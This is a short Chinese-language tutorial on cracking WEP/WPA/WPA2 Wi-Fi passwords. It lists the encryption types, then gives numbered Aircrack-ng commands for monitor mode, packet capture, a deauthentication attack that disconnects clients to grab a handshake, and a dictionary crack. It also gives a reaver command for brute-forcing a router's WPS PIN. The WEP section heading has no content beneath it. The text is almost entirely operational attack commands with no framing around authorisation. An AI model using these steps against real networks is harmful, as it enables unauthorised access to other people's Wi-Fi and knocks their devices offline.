wifi加密方式
1.不启用安全
2.WEP
3.WPA/WPA2-PSK(预共享密钥)
4.WPA/WPA2 802.1X (radius认证)
WEP加密方式的破解
WPA/WPA2-PSK加密方式的破解
使用Aircrack-ng工具,依次输入以下命令
防止设备繁忙
1.airmon-ng check kill
查看无线网卡状态
2.ifconfig/iwconfig/ifconfig -a
加载无线网卡,已加载则忽略
3.ifconfig wlan0 up
激活网卡
4.airmon-ng start wlan0
探测无线网络
5.airodump-ng mon0
开始抓包
6.airodump-ng --ivs -w finame -c 6 mon0
ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6
airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w finame mon0
deauth攻击,获取握手包
7.aireplay-ng -0 大小 -a 主机mac -c 客户端mac mon0
攻击时网卡必须和需要破解的wifi在同一频道。
deauth攻击为了获得握手包,会让链接的客户端断开。
如果出现“interfaceX is on channel Y, but the AP uses channel Z”,请输入:
sudo iwconfig wlan0 channel wifi的频道
跑字典破解
8.aircrack-ng -w password.lst finame-01.cap
本机测试时,大约为1.6k/s。也就是1分钟跑9.6万条密码。跑完字典大概40多分钟(字典比较小,共有3741905条密码)
利用路由器wps功能漏洞,跑pin码破解
输入命令
reaver -i mon0 -b MAC地址 -a -S -vv -d1 -t 3 -c 1
后续教程计划:
1.彩虹表破解
2.使用GPU加速破解
3.集群破解